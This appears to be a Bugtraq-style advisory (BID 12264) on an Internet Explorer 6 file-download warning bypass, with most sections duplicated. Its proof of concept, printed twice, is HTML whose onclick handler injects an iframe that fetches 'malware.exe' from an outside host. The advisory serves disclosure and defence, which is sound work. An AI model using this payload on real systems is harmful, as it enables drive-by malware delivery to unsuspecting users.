Microsoft Internet Explorer Dynamic IFRAME File Download Security Warning Bypass Weakness
BID:12264
Info
Microsoft Internet Explorer Dynamic IFRAME File Download Security Warning Bypass Weakness
| Bugtraq ID: | 12264 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 13 2005 12:00AM |
| Updated: | Jan 13 2005 12:00AM |
| Credit: | Discovery is credited to Rafel Ivgi, The-Insider <[email protected]>. |
| Vulnerable: |
Microsoft Internet Explorer 6.0 SP2 - do not use Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 |
| Not Vulnerable: | |
Discussion
Microsoft Internet Explorer Dynamic IFRAME File Download Security Warning Bypass Weakness
Microsoft Internet Explorer is reported prone to a file download security warning bypass weakness. This issue may be exploited to download a malicious file to the client system.
It is reported that this security warning can be bypassed by creating a document containing a specially crafted HTML BODY tag and a dynamic IFRAME.
By enticing a user to visit a site, the attacker can potentially plant malicious files on vulnerable systems in order to execute malicious code. It should be noted that although no security warning appears, the standard download confirmation widnow still appears and requires the user to confirm the download prior to any files being placed on the unsuspecting user's computer.
This vulnerability may be combined with other issues in the browser or the affected computer to aid in various attacks.
It should also be noted that Symantec has been unable to replicate this issue. Furthermore Microsoft has stated that this is not a vulnerability. This BID will be updated when further information becomes available.
Internet Explorer 6.0 running on Microsoft Windows XP SP2 is reported to be affected by this vulnerability. It is conjectured that other versions of Internet Explorer are vulnerable as well. This BID will be updated when more information about affected packages is available.
Microsoft Internet Explorer is reported prone to a file download security warning bypass weakness. This issue may be exploited to download a malicious file to the client system.
It is reported that this security warning can be bypassed by creating a document containing a specially crafted HTML BODY tag and a dynamic IFRAME.
By enticing a user to visit a site, the attacker can potentially plant malicious files on vulnerable systems in order to execute malicious code. It should be noted that although no security warning appears, the standard download confirmation widnow still appears and requires the user to confirm the download prior to any files being placed on the unsuspecting user's computer.
This vulnerability may be combined with other issues in the browser or the affected computer to aid in various attacks.
It should also be noted that Symantec has been unable to replicate this issue. Furthermore Microsoft has stated that this is not a vulnerability. This BID will be updated when further information becomes available.
Internet Explorer 6.0 running on Microsoft Windows XP SP2 is reported to be affected by this vulnerability. It is conjectured that other versions of Internet Explorer are vulnerable as well. This BID will be updated when more information about affected packages is available.
Exploit / POC
Microsoft Internet Explorer Dynamic IFRAME File Download Security Warning Bypass Weakness
An exploit is not required to leverage this weakness.
The following proof of concept is available:
Paste into an htm/html file and add "<" at the begining of each line:
------------------------ cut here --------------------------------------
!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
!-- saved from url=(0031)http://theinsider.deep-ice.com/ -->
HTML><HEAD><TITLE>The-Insider http://theinsider.deep-ice.com</TITLE>
META http-equiv=expires content="01 Jan 1998 01:01:00 GMT">
META http-equiv=Content-Type content="text/html; charset=windows-1252">
META http-equiv=Content-Language content=en-us>
META content=True name=HandheldFriendly>
META content="MSHTML 6.00.2900.2523" name=GENERATOR></HEAD>
embed>
body onclick='a=document.createElement("\<iframe src=\"http:\/
\/theinsider.deep-
ice.com\/malware.exe\"\>\<\/iframe\>");document.body.appendChild
(a);setTimeout("document.execCommand\(\"refresh\")",1000)'>
cebter><br><br><br><br><br><br>Click AnyWhere You Want</cen
ter>
/BODY></HTML>
An exploit is not required to leverage this weakness.
The following proof of concept is available:
Paste into an htm/html file and add "<" at the begining of each line:
------------------------ cut here --------------------------------------
!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
!-- saved from url=(0031)http://theinsider.deep-ice.com/ -->
HTML><HEAD><TITLE>The-Insider http://theinsider.deep-ice.com</TITLE>
META http-equiv=expires content="01 Jan 1998 01:01:00 GMT">
META http-equiv=Content-Type content="text/html; charset=windows-1252">
META http-equiv=Content-Language content=en-us>
META content=True name=HandheldFriendly>
META content="MSHTML 6.00.2900.2523" name=GENERATOR></HEAD>
embed>
body onclick='a=document.createElement("\<iframe src=\"http:\/
\/theinsider.deep-
ice.com\/malware.exe\"\>\<\/iframe\>");document.body.appendChild
(a);setTimeout("document.execCommand\(\"refresh\")",1000)'>
cebter><br><br><br><br><br><br>Click AnyWhere You Want</cen
ter>
/BODY></HTML>
Solution / Fix
Microsoft Internet Explorer Dynamic IFRAME File Download Security Warning Bypass Weakness
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Microsoft Internet Explorer Dynamic IFRAME File Download Security Warning Bypass Weakness
References:
References:
- Technet Security (Microsoft)